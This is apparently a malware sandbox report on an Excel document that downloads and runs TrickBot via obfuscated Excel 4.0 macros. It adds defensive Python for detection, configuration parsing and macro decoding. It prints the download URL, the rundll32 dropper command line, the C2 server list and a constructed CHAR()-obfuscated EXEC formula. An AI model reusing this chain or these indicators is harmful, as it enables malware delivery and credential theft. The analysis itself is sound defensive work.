Analysis Report 446446.xls

Overview

General Information

Sample Name:446446.xls
Analysis ID:385552
MD5:1b62b4f4b16d6219dce4c6d145c5af79
SHA1:d5bc46f3043119c020ae93121195aabbf151cf75
SHA256:dd3ecdcc3a6cc81ee451f90703cc899ff43c7a05b30a6538e5f3afd73f77adb1

Detection

Label: Hidden Macro 4.0, TrickBot
Score: 96 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Trickbot
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Office process drops PE file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2056, cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe from C:\Windows\System32 (PID: 2564, cmdline: rundll32 ..\fdinmd.fii,StartW, MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe from C:\Windows\SysWOW64 (PID: 2588, cmdline: rundll32 ..\fdinmd.fii,StartW, MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • wermgr.exe (PID: 2604, cmdline: C:\Windows\system32\wermgr.exe, MD5: 41DF7355A5A907E2C1D7804EC028965D)

Reading the chain: Excel starts the 64-bit rundll32 on the dropped file fdinmd.fii (a DLL stored without a .dll extension, entered through its StartW export; the ..\ path is resolved against the working directory inherited from Excel and lands on C:\Users\user\fdinmd.fii, where Excel wrote it). That process re-launches the SysWOW64 copy, which is what rundll32 does when handed a 32-bit DLL on 64-bit Windows, and the 32-bit instance (process "4" in the memory-dump and unpacked-PE names below) starts wermgr.exe; together with the "Creates a process in suspended mode" signature this points to wermgr.exe being used as the injection host.
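
The chain above is the detection opportunity that the Sigma section of this report does not cover ("No Sigma rule has matched"). The Python below is an added example, not part of the Joe Sandbox report: it evaluates two rules over constructed process-creation events modelled on the tree (PIDs, image paths and command lines are the report's; parent links are assumed from the indentation), namely an Office host starting rundll32 with a module argument that does not end in .dll, and rundll32 starting wermgr.exe. A benign control event (Excel starting rundll32 on shell32.dll, constructed) is included to show that the first rule stays quiet on a normal DLL path.

```python
"""Flag the Excel -> rundll32 -> wermgr.exe chain in process-creation events."""
import os
import re

# Constructed events modelled on the Startup tree above; PIDs, images and
# command lines are the report's, parent links follow the tree indentation.
EVENTS = [
    {"pid": 2056, "ppid": 1,
     "image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "cmdline": r"'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding"},
    {"pid": 2564, "ppid": 2056, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32 ..\fdinmd.fii,StartW"},
    {"pid": 2588, "ppid": 2564, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"rundll32 ..\fdinmd.fii,StartW"},
    {"pid": 2604, "ppid": 2588, "image": r"C:\Windows\system32\wermgr.exe",
     "cmdline": r"C:\Windows\system32\wermgr.exe"},
    # Benign control (constructed): Excel invoking a real DLL through rundll32.
    {"pid": 3000, "ppid": 2056, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

OFFICE_HOSTS = {"excel.exe", "winword.exe", "powerpnt.exe"}

# rundll32[.exe] (quoted or bare), whitespace, then the module argument
# (quoted path or bare token, possibly followed by ",ExportName").
RUNDLL_RE = re.compile(
    r'^\s*(?:"[^"]*rundll32(?:\.exe)?"|\S*rundll32(?:\.exe)?)\s+("[^"]+"|\S+)', re.I)


def image_name(path):
    """Lower-cased file name of a Windows image path."""
    return os.path.basename(path.replace("\\", "/")).lower()


def rundll32_module(cmdline):
    """Module argument of a rundll32 command line, without the ',Export' suffix."""
    m = RUNDLL_RE.match(cmdline)
    if not m:
        return None
    return m.group(1).strip('"').split(",", 1)[0]


def detect(events):
    """Return (pid, rule, detail) for every event that matches a rule."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent is None:
            continue
        child, par = image_name(e["image"]), image_name(parent["image"])
        # Rule 1: Office host -> rundll32 whose module is not a .dll file.
        if par in OFFICE_HOSTS and child == "rundll32.exe":
            module = rundll32_module(e["cmdline"])
            if module and not module.lower().endswith(".dll"):
                alerts.append((e["pid"], "office_rundll32_nondll_module", module))
        # Rule 2: rundll32 -> wermgr.exe (WER manager has no business under rundll32).
        if par == "rundll32.exe" and child == "wermgr.exe":
            alerts.append((e["pid"], "rundll32_spawns_wermgr", e["cmdline"]))
    return alerts


if __name__ == "__main__":
    for pid, rule, detail in detect(EVENTS):
        print(f"{pid}\t{rule}\t{detail}")
```

The System32 to SysWOW64 rundll32 hop (PID 2564 to 2588) is deliberately not a rule: it is ordinary WOW64 behaviour and would fire on every 32-bit DLL. Rule 1 is the one to tune in production, since some add-ins do launch rundll32 from Office; the non-.dll module check is what separates this sample from those.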

Malware Configuration

Threatname: Trickbot

{
  "ver": "2000028",
  "gtag": "rob52",
  "servs": [
    "89.250.208.42:449", "182.253.184.130:449", "31.211.85.110:443",
    "85.112.74.178:449", "102.68.17.97:443", "103.76.150.14:443",
    "96.9.77.142:443", "91.185.236.170:449", "87.76.1.81:449",
    "91.225.231.120:443", "62.213.14.166:443", "201.114.152.181:60304",
    "91.248.207.239:13871", "5.50.104.227:23468", "122.117.176.99:50289",
    "250.16.62.7:12037", "43.219.127.177:42389", "183.210.9.161:55813",
    "203.2.134.219:34188", "24.203.49.183:64402", "89.227.14.153:60566",
    "44.55.149.111:41730", "197.181.162.30:5798", "152.49.214.109:59125",
    "245.241.127.55:36657", "107.85.198.194:37398", "191.250.160.220:23460",
    "40.81.224.235:45065", "211.246.214.27:8638"
  ],
  "autorun": ["pwgrab"],
  "ecc_key": "RUNTMzAAAAAL/ZqmMPBLaRfg1hPOtFJrZz2Zi2/EC4B3fiX8VnaOUVKndBr+jEqWc7mw4v3ADTiwp64K5QKe1LZ27jUZxL4bWjxARPo85hv72nuedeZhRQ+adQQ/gIsV869MycRzghc="
}

Fields: ver is the bot build number, gtag the campaign tag (rob52), servs the C2 list (29 IP:port entries; the first eleven use 443 or 449, the rest high random ports, and two of those, 250.16.62.7 and 245.241.127.55, sit in the reserved 240.0.0.0/4 block and cannot be reached), autorun the modules the bot loads at start (pwgrab, the credential grabber, which is what the "Stealing of Sensitive Information" grouping below rests on), and ecc_key the public key the bot uses to verify signed data from its C2, stored as a CNG ECC key blob.
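
As an added example (not from the report), the Python below parses this configuration: it decodes ecc_key as a CNG BCRYPT_ECCKEY_BLOB (magic "ECS3", the ECDSA P-384 public-key magic, then cbKey = 48 and the 48-byte big-endian X and Y coordinates), checks that the point actually lies on P-384, and splits servs into the entries on 443/449, the entries on high ports, and the entries whose addresses fall in reserved or private ranges. The configuration literal is the one extracted above, reproduced as a Python dict; the curve constants are NIST P-384's.

```python
"""Parse the TrickBot configuration above: C2 list and ECDSA P-384 public key."""
import base64
import ipaddress
import struct

# Configuration as extracted by the sandbox (reproduced from the report above).
CONFIG = {
    "ver": "2000028",
    "gtag": "rob52",
    "servs": [
        "89.250.208.42:449", "182.253.184.130:449", "31.211.85.110:443",
        "85.112.74.178:449", "102.68.17.97:443", "103.76.150.14:443",
        "96.9.77.142:443", "91.185.236.170:449", "87.76.1.81:449",
        "91.225.231.120:443", "62.213.14.166:443", "201.114.152.181:60304",
        "91.248.207.239:13871", "5.50.104.227:23468", "122.117.176.99:50289",
        "250.16.62.7:12037", "43.219.127.177:42389", "183.210.9.161:55813",
        "203.2.134.219:34188", "24.203.49.183:64402", "89.227.14.153:60566",
        "44.55.149.111:41730", "197.181.162.30:5798", "152.49.214.109:59125",
        "245.241.127.55:36657", "107.85.198.194:37398", "191.250.160.220:23460",
        "40.81.224.235:45065", "211.246.214.27:8638",
    ],
    "autorun": ["pwgrab"],
    "ecc_key": "RUNTMzAAAAAL/ZqmMPBLaRfg1hPOtFJrZz2Zi2/EC4B3fiX8VnaOUVKndBr+jEqWc7mw4v3ADTiwp64K5QKe1LZ27jUZxL4bWjxARPo85hv72nuedeZhRQ+adQQ/gIsV869MycRzghc=",
}

# CNG BCRYPT_ECCKEY_BLOB header: ULONG dwMagic, ULONG cbKey, then X and Y.
BCRYPT_ECDSA_PUBLIC_P384_MAGIC = 0x33534345   # b"ECS3" read little-endian
# NIST P-384: y^2 = x^3 - 3x + b (mod p)
P384_P = 2**384 - 2**128 - 2**96 + 2**32 - 1
P384_B = 0xb3312fa7e23ee7e4988e056be3f82d19181d9c6efe8141120314088f5013875ac656398d8a2ed19d2a85c8edd3ec2aef


def parse_ecc_key(b64):
    """Decode the blob, validate its header and check the point is on P-384."""
    blob = base64.b64decode(b64)
    magic, cb_key = struct.unpack_from("<II", blob, 0)
    if magic != BCRYPT_ECDSA_PUBLIC_P384_MAGIC:
        raise ValueError("not an ECDSA P-384 public key blob: magic 0x%08x" % magic)
    if len(blob) != 8 + 2 * cb_key:
        raise ValueError("blob is %d bytes, expected %d" % (len(blob), 8 + 2 * cb_key))
    x = int.from_bytes(blob[8:8 + cb_key], "big")
    y = int.from_bytes(blob[8 + cb_key:], "big")
    on_curve = (y * y - (x * x * x - 3 * x + P384_B)) % P384_P == 0
    return {"curve": "P-384", "cb_key": cb_key, "x": x, "y": y, "on_curve": on_curve}


def c2_indicators(config):
    """Split servs into (ip, port) tuples by port class and reachability."""
    standard, high_port, unreachable = [], [], []
    for entry in config["servs"]:
        host, port = entry.rsplit(":", 1)
        ip, port = ipaddress.ip_address(host), int(port)
        if ip.is_reserved or ip.is_private or ip.is_multicast:
            unreachable.append((str(ip), port))     # e.g. 240.0.0.0/4 addresses
        elif port in (443, 449):
            standard.append((str(ip), port))
        else:
            high_port.append((str(ip), port))
    return {"standard": standard, "high_port": high_port, "unreachable": unreachable}


def summarize(config):
    key = parse_ecc_key(config["ecc_key"])
    c2 = c2_indicators(config)
    return {
        "ver": config["ver"], "gtag": config["gtag"], "autorun": config["autorun"],
        "key_valid": key["on_curve"], "key_x_hex": "%096x" % key["x"],
        "c2_standard": len(c2["standard"]), "c2_high_port": len(c2["high_port"]),
        "c2_unreachable": c2["unreachable"],
    }


if __name__ == "__main__":
    for k, v in summarize(CONFIG).items():
        print(f"{k}: {v}")
```

The on-curve check matters because a config extractor that mis-slices the blob yields a plausible-looking but useless key; a point that satisfies the curve equation is strong evidence the 104 bytes were carved correctly. Blocking the eleven 443/449 entries is the obvious network control; the high-port entries are worth logging but the two reserved-range addresses will never produce a connection.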

Yara Overview

Initial Sample

Source: 446446.xls
Rule: SUSP_EnableContent_String_Gen (author: Florian Roth)
Description: Detects suspicious string that asks to enable active content in Office Doc
Strings:
  • 0x165db: $e1: Enable Editing
  • 0x16325: $e3: Enable editing
  • 0x163f7: $e4: Enable content

Memory Dumps

Rule: JoeSecurity_TrickBot_4 (author: Joe Security), description: Yara detected Trickbot
Sources:
  • 00000004.00000002.2089168736.0000000000650000.00000004.00000001.sdmp
  • 00000004.00000002.2089228876.00000000007C0000.00000040.00000001.sdmp
  • 00000004.00000002.2089212647.0000000000780000.00000040.00000001.sdmp

Unpacked PEs

Rule: JoeSecurity_TrickBot_4 (author: Joe Security), description: Yara detected Trickbot
Sources:
  • 4.2.rundll32.exe.780000.2.unpack
  • 4.2.rundll32.exe.650000.0.raw.unpack
  • 4.2.rundll32.exe.780000.2.raw.unpack

Note that the only rule matching the document itself is the generic lure-text rule; every TrickBot match is in process 4, the SysWOW64 rundll32.exe (PID 2588), in private regions at 0x650000 (protection 0x04, read/write) and 0x780000 / 0x7C0000 (protection 0x40, execute/read/write), i.e. in the payload after it unpacked in memory, not in fdinmd.fii as written to disk.

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
  Source: 00000004.00000002.2089228876.00000000007C0000.00000040.00000001.sdmp; Malware Configuration Extractor: Trickbot (the configuration reproduced under Malware Configuration above)

Further sources:
  Source: EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Note that no antivirus engine flagged the initial document or the dropped files (see "Antivirus, Machine Learning and Genetic Malware Detection" below); the single engine hit, Avira HEUR/AGEN.1138157, is on the unpacked PE carved from rundll32.exe memory, and the VirusTotal lookup for the sample was rate-limited in this run. The "AV Detection" verdict here therefore rests on the configuration extractor and the Yara matches, not on static scanning of 446446.xls.

Software Vulnerabilities:

Document exploit detected (drops PE files)
  Source: EXCEL.EXE; File created: 4HeVw[1].perclick.0.dr

Document exploit detected (UrlDownloadToFile)
  Source: EXCEL.EXE; Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll, origin: URLDownloadToFileA

Document exploit detected (process start blacklist hit)
  Source: EXCEL.EXE; Process created: C:\Windows\System32\rundll32.exe

Potential document exploit detected (performs DNS queries / performs HTTP gets / unknown TCP traffic)
  Source: global traffic; DNS query: living-traditions.com
  Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 64.207.186.30:80
  Source: global traffic; HTTP traffic detected:
    GET /blogs/click.php HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: living-traditions.com
    Connection: Keep-Alive
  Source: 446446.xls, 51DE0000.0.dr; String found in binary or memory: http://living-traditions.com/blogs/click.php
  Source: EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1281B7DE.emf

The request is made from inside EXCEL.EXE through URLDownloadToFileA (urlmon), so the user agent is the Internet Explorer compatibility string that WinINet sends by default, not evidence of a browser; a legitimate Office download carries the same header, which is why "Uses a known web browser user agent" is context rather than a detection on its own. The download URL is present in clear text in the document (51DE0000.0.dr) and resolved to 64.207.186.30 on port 80 during the run.

Strings found in rundll32.exe memory (00000003.00000002.2089923070.0000000001BA0000 and 2090115718.0000000001D87000; 00000004.00000002.2089354502.0000000001F50000 and 2089561983.0000000002137000 .sdmp). These are generic URLs from Windows components mapped into the process and are not sample-specific indicators; where the report scored them they are rated safe or high reputation:
  • http://www.hotmail.com/oe (from the string "Please visit http://www.hotmail.com/oe to learn more.")
  • http://investor.msn.com and http://investor.msn.com/
  • http://localizability/practices/XML.asp
  • http://localizability/practices/XMLConfiguration.asp
  • http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
  • http://windowsmedia.com/redir/services.asp?WMPFriendly=true
  • http://www.icra.org/vocabulary/.
  • http://www.msnbc.com/news/ticker.txt
  • http://www.windows.com/pctv. (00000004.00000002.2089354502.0000000001F50000 only)

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
  Source: Screenshot number 4 and document image extractions 2, 3, 4 and 13 (OCR). The lure text reads: "Enable editing" to unlock the editing document downloaded from the Internet. / "Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document. The Protected View banner is visible in the same images, so the document is asking the user to leave Protected View and then to enable macros.

Found Excel 4.0 Macro with suspicious formulas
  Source: 446446.xls; initial sample: CALL
  Source: 446446.xls; initial sample: EXEC

Found obfuscated Excel 4.0 Macro
  Source: 446446.xls; initial sample: High usage of CHAR() function: 39
  Source: 446446.xls; initial sample: High usage of CHAR() function: 26

Two macro indicators are present in the file: Excel 4.0 (XLM) formulas on a hidden macro sheet (the CALL/EXEC formulas and the CHAR()-assembled strings above) and an OLE "VBA macros" indicator listed further down. The observed behaviour, URLDownloadToFileA from EXCEL.EXE followed by rundll32 on the dropped file, matches the CALL/EXEC chain; the report does not reproduce the formula text itself.
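
To show what the two findings above look like in practice, the Python below is an added example, not the macro from this sample (the report does not reproduce its formulas): it takes three constructed macro-sheet cells in the style these signatures key on, text assembled from CHAR(n) calls, quoted literals and references to other cells, counts the CHAR() calls, decodes each cell, and flags decoded text containing CALL(, EXEC(, URLDownloadToFile, rundll32 or a URL. The cell contents are built from strings that do appear in this report (the rundll32 command line and the download URL); the cell layout and the use of CHAR(61) to produce a leading "=" are the constructed part.

```python
"""Decode CHAR()-concatenated Excel 4.0 (XLM) formulas and flag risky content."""
import re

# Constructed macro-sheet cells (not extracted from the sample). A1 builds the
# rundll32 command line, A2 wraps it in an EXEC() formula starting with "="
# (CHAR(61)), A3 builds the download URL four characters at a time.
SAMPLE_CELLS = {
    "A1": r'="rundll32 ..\fdinmd.fii"&CHAR(44)&"StartW"',
    "A2": r'=CHAR(61)&"EXEC("&CHAR(34)&A1&CHAR(34)&")"',
    "A3": r'=CHAR(104)&CHAR(116)&CHAR(116)&CHAR(112)&"://living-traditions.com/blogs/click.php"',
}

SUSPICIOUS = ("CALL(", "EXEC(", "URLDownloadToFile", "rundll32", "http://", "https://")
CELL_REF = re.compile(r"^[A-Z]{1,3}\d+$")
CHAR_CALL = re.compile(r"^CHAR\((\d+)\)$", re.I)


def split_concat(expr):
    """Split an XLM expression on '&' operators that sit outside string literals."""
    parts, cur, in_str = [], [], False
    for c in expr:
        if c == '"':
            in_str = not in_str
        if c == "&" and not in_str:
            parts.append("".join(cur).strip())
            cur = []
        else:
            cur.append(c)
    parts.append("".join(cur).strip())
    return parts


def decode_formula(formula, cells, depth=0):
    """Evaluate a formula made of literals, CHAR(n), numbers and cell references."""
    if depth > 16:                     # guard against reference cycles
        return ""
    expr = formula[1:] if formula.startswith("=") else formula
    out = []
    for piece in split_concat(expr):
        m = CHAR_CALL.match(piece)
        if m:
            out.append(chr(int(m.group(1))))
        elif len(piece) >= 2 and piece[0] == piece[-1] == '"':
            out.append(piece[1:-1].replace('""', '"'))   # XLM escapes " as ""
        elif CELL_REF.match(piece) and piece in cells:
            out.append(decode_formula(cells[piece], cells, depth + 1))
        else:
            out.append(piece)          # numbers or calls not modelled: keep verbatim
    return "".join(out)


def analyze_cells(cells):
    """CHAR() count (the signature's metric), decoded cells, and flagged cells."""
    char_calls = sum(len(re.findall(r"CHAR\(\d+\)", f, re.I)) for f in cells.values())
    decoded = {addr: decode_formula(f, cells) for addr, f in cells.items()}
    flagged = {}
    for addr, text in decoded.items():
        hits = [t for t in SUSPICIOUS if t.lower() in text.lower()]
        if hits:
            flagged[addr] = hits
    return {"char_calls": char_calls, "decoded": decoded, "flagged": flagged}


if __name__ == "__main__":
    result = analyze_cells(SAMPLE_CELLS)
    print("CHAR() calls:", result["char_calls"])
    for addr, text in result["decoded"].items():
        print(f"{addr}: {text}   flags={result['flagged'].get(addr, [])}")
```

The decoder follows cell references, which is what makes it useful against real samples: the formula that finally runs is rarely the one that contains the readable string. The threshold the sandbox applies (39 and 26 CHAR() calls here) is just this counter taken over the whole sheet; on its own it is a weak signal, but combined with a decoded CALL( or EXEC( it is conclusive.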
Office process drops PE file
  Source: EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\4HeVw[1].perclick
  Source: EXCEL.EXE; File created: C:\Users\user\fdinmd.fii

The first file is the cached copy of the download in the Temporary Internet Files store; the second is the copy Excel writes to the profile root and then hands to rundll32. Neither carries a .dll extension (hence "Drops files with a non-matching file extension"), and only fdinmd.fii is ever executed; the cache copy is the "dropped PE file which has not been started" recorded under Boot Survival.

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
  Source: C:\Windows\SysWOW64\rundll32.exe; Memory allocated: 76E20000, page execute and read and write
  Source: C:\Windows\SysWOW64\rundll32.exe; Memory allocated: 76D20000, page execute and read and write

Document contains embedded VBA macros
  Source: 446446.xls; OLE indicator, VBA macros: true

Yara signature match
  Source: 446446.xls, type: SAMPLE; matched rule: SUSP_EnableContent_String_Gen (date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research)

Uses code obfuscation techniques (call, push, ret)
  Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 4_2_007C27CB push dword ptr [edx+14h]; ret 4_2_007C282D
  Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 4_2_007C2720 push dword ptr [edx+14h]; ret 4_2_007C282D

Further sources:
  Source: rundll32.exe, 00000003.00000002.2089923070.0000000001BA0000 and 00000004.00000002.2089354502.0000000001F50000 .sdmp; binary or memory string: .VBPud<_
  Source: classification engine; classification label: mal96.troj.expl.evad.winXLS@7/7@1/1
  Source: EXCEL.EXE; File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT
  Source: EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\CVRC532.tmp
  Source: 446446.xls; OLE indicator, Workbook stream: true
  Source: EXCEL.EXE; File read: C:\Users\desktop.ini
  Source: C:\Windows\System32\rundll32.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
  Source: unknown; Process created: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
  Source: EXCEL.EXE; Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fdinmd.fii,StartW
  Source: C:\Windows\System32\rundll32.exe; Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fdinmd.fii,StartW
  Source: C:\Windows\SysWOW64\rundll32.exe; Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
  Source: Window Recorder; Window detected: More than 3 window changes detected
  Source: EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
  Source: EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Boot Survival:

Drops PE files to the user root directory
  Source: EXCEL.EXE; File created: C:\Users\user\fdinmd.fii

Further sources:
  Source: EXCEL.EXE; Process information set: NOOPENFILEERRORBOX (recorded 26 times)
  Source: C:\Windows\System32\rundll32.exe; Process information set: NOOPENFILEERRORBOX
  Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
  Source: EXCEL.EXE; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\4HeVw[1].perclick
  Source: C:\Windows\System32\rundll32.exe; Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fdinmd.fii,StartW
  Source: C:\Windows\SysWOW64\rundll32.exe; Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe

No persistence mechanism (run key, scheduled task or service) is recorded in this run; the grouping reflects the drop into the profile root only. The analysis stopped on timeout after 5 minutes 20 seconds (see General Information), so the absence of a persistence artefact here should not be read as the absence of one in the sample.

Stealing of Sensitive Information:

Yara detected Trickbot
  Source: Yara match, type MEMORY: 00000004.00000002.2089168736.0000000000650000.00000004.00000001.sdmp
  Source: Yara match, type MEMORY: 00000004.00000002.2089228876.00000000007C0000.00000040.00000001.sdmp
  Source: Yara match, type MEMORY: 00000004.00000002.2089212647.0000000000780000.00000040.00000001.sdmp
  Source: Yara match, type UNPACKEDPE: 4.2.rundll32.exe.780000.2.unpack
  Source: Yara match, type UNPACKEDPE: 4.2.rundll32.exe.650000.0.raw.unpack
  Source: Yara match, type UNPACKEDPE: 4.2.rundll32.exe.780000.2.raw.unpack

Remote Access Functionality:

Yara detected Trickbot
  Sources: the same three memory dumps and three unpacked PEs listed under Stealing of Sensitive Information.

Mitre Att&ck Matrix

Techniques with signature hits, by tactic. The bracketed figures are the hit counts exactly as extracted from the report's matrix; the remaining cells of the original (Valid Accounts, At (Linux), Logon Script and so on) are the unmatched matrix template and are omitted.

Initial Access: none
Execution: Scripting [21], Exploitation for Client Execution [33]
Persistence: none
Privilege Escalation: Process Injection [11]
Defense Evasion: Masquerading [121], Disable or Modify Tools [1], Rundll32 [1], Process Injection [11], Scripting [21], Obfuscated Files or Information [1]
Credential Access: none
Discovery: File and Directory Discovery [1], System Information Discovery [2]
Lateral Movement: none
Collection: none
Exfiltration: none
Command and Control: Non-Application Layer Protocol [2], Application Layer Protocol [12], Ingress Tool Transfer [2]
Network Effects, Remote Service Effects, Impact: none

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              No Antivirus matches

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

Source: 4.2.rundll32.exe.780000.2.unpack; Detection: 100%; Scanner: Avira; Label: HEUR/AGEN.1138157

              Domains

              No Antivirus matches

              URLs

Source: http://www.icra.org/vocabulary/.; Detection: 0%; Scanner: URL Reputation; Label: safe
Source: http://windowsmedia.com/redir/services.asp?WMPFriendly=true; Detection: 0%; Scanner: URL Reputation; Label: safe
Source: http://living-traditions.com/blogs/click.php; Detection: 0%; Scanner: Avira URL Cloud; Label: safe

Domains and IPs

Contacted Domains

Name: living-traditions.com
IP: 64.207.186.30
Active: true
Malicious: false
Antivirus Detection: none
Reputation: unknown

Contacted URLs

Name: http://living-traditions.com/blogs/click.php
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

The contacted URL and its IP are the actionable network indicators from this run even though no reputation service had flagged them at analysis time (Avira URL Cloud: safe, reputation unknown); a clean reputation on a freshly used download URL is the normal case, not evidence of benign traffic.

URLs from Memory and Binaries

All entries were found in rundll32.exe memory (00000003.00000002.2089923070.0000000001BA0000, 00000003.00000002.2090115718.0000000001D87000, 00000004.00000002.2089354502.0000000001F50000 and 00000004.00000002.2089561983.0000000002137000 .sdmp) and are marked malicious: false.
  • http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check (reputation: high)
  • http://www.windows.com/pctv. (00000004.00000002.2089354502.0000000001F50000 only; reputation: high)
  • http://investor.msn.com (reputation: high)
  • http://www.msnbc.com/news/ticker.txt (reputation: high)
  • http://www.icra.org/vocabulary/. (URL Reputation: safe; reputation: unknown)
  • http://windowsmedia.com/redir/services.asp?WMPFriendly=true (URL Reputation: safe; reputation: unknown)
  • http://www.hotmail.com/oe (reputation: high)
  • http://investor.msn.com/ (reputation: high)

Contacted IPs

Public

IP: 64.207.186.30
Domain: living-traditions.com
Country: United States
ASN: 398110 (GO-DADDY-COM-LLC, US)
Malicious: false

                            General Information

                            Joe Sandbox Version:31.0.0 Emerald
                            Analysis ID:385552
                            Start date:12.04.2021
                            Start time:17:05:10
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 5m 20s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:446446.xls
                            Cookbook file name:defaultwindowsofficecookbook.jbs
                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:7
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal96.troj.expl.evad.winXLS@7/7@1/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 32.1% (good quality ratio 25%)
                            • Quality average: 58.1%
                            • Quality standard deviation: 41.3%
                            HCA Information:
                            • Successful, ratio: 83%
                            • Number of executed functions: 3
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .xls
                            • Found Word or Excel or PowerPoint or XPS Viewer
                            • Attach to Office via COM
                            • Scroll down
                            • Close Viewer
                            Warnings:
                            • Exclude process from analysis (whitelisted): dllhost.exe
                            • Report size getting too big, too many NtCreateFile calls found.
                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/385552/sample/446446.xls

                            Simulations

                            Behavior and APIs

Time:17:05:41
Type:API Interceptor
Description:1x Sleep call for process: rundll32.exe modified

                            Joe Sandbox View / Context

                            IPs

                            No context

                            Domains

                            No context

                            ASN

Match:GO-DADDY-COM-LLCUS
Associated Sample Name / URL (Detection): Context
• documents-1982636004.xlsm (malicious): 107.180.50.162
• documents-1982636004.xlsm (malicious): 107.180.50.162
• documents-466266883.xlsm (malicious): 107.180.50.162
• documents-466266883.xlsm (malicious): 107.180.50.162
• Processed APR12.xlsx (malicious): 192.169.223.13
• NdBLyH2h5d.exe (malicious): 184.168.131.241
• 4oItdZkNOZ.exe (malicious): 107.180.50.167
• Portfolio.exe (malicious): 72.167.241.46
• 12042021493876783,xlsx.exe (malicious): 184.168.131.241
• CIVIP-8287377.exe (malicious): 184.168.177.1
• MT103_004758.exe (malicious): 184.168.131.241
